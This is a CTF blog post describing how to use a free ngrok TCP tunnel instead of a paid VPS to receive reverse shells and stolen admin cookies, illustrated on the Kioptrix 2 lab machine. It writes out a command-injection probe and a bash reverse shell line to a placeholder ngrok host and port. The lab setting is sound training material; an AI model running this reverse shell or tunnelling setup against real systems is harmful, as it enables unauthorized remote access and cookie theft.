Doing CTF without paying VPS

The goal

I think many of us do CTFs, but also many of us don’t have any money, because we’re student or addict to drugs. So when you don’t have any money, you get creative.

For webguys who are looking for a reverse shell or who want admin cookies on a remote host (hello root-me), but don’t want to pay for a VPS, there is a free solution. Ngrok.

How it works?

Rather than making a super long and incomprehensible paragraph, here is a small diagram coming directly from the ngrok site:

So for our needs we will make a tcp tunnel between our port listening with netcat and ngrok. To listen on the internet and wait for remote data:


Now, let’s move on to practice.

Ngrok installation

All those step are explained on the ngrok website. But first, you need to create an account, it will have a unique identifier. You can put garbage:

And then download the right archive, for me it’s Linux:

Unzip the archive, past the ngrok line with your private authtoken and we can start.

▶ unzip 
  inflating: ngrok                   

▶ ./ngrok authtoken ENTERYOUROWN
Authtoken saved to configuration file: /home/maki/.ngrok2/ngrok.yml

▶ ./ngrok help                                                 
   ngrok - tunnel local ports to public URLs and inspect traffic

    ngrok exposes local networked services behinds NATs and firewalls to the

It’s successfully installed.

Practical example

Ok, so I start a boot2root machine on kioptrix 2 (download link + WU in resource section).

Here is the RCE:


Now, let’s check which command are available for a reverse shell:

; which nc python python2 python3 perl ruby php bash


You can find lot of amazing payload on:

We will use bash command with the following payload:

bash -i >& /dev/tcp/NGROK_IP/NGROK_PORT 0>&1

  • NGROK_IP: Is the ngrok remote host with a domain like “”.
  • NGROK_PORT: The forwarding port associate to the ngrok remote host.


I used netcat for my port listening, but you can use python3 -m http.server 31337 to catch GET data with a real web server for example.


This little trick allowed me to solve a lot of challenges without having a VPS. I hope you enjoyed this little blogpost :)

Feel free to ask me what you want on twitter @maki_chaz.

Happy hacking guys :D


  1. Root-me, Une plateforme rapide, accessible et réaliste pour tester vos compétences en hacking., Root-me official website:
  2. Ngrok team, What is ngrok?, Official ngrok blog:
  3. Vulnhub, Kioptrix: Level 1.1 (#2), Vulnhub team:,23/
  4. Abatchy, Kioptrix 2 Walktrhough (Vulnhub), abatchy’s blog:
  5. pentestmonkey, Reverse Shell Cheat Sheet, pentestmonkey blog: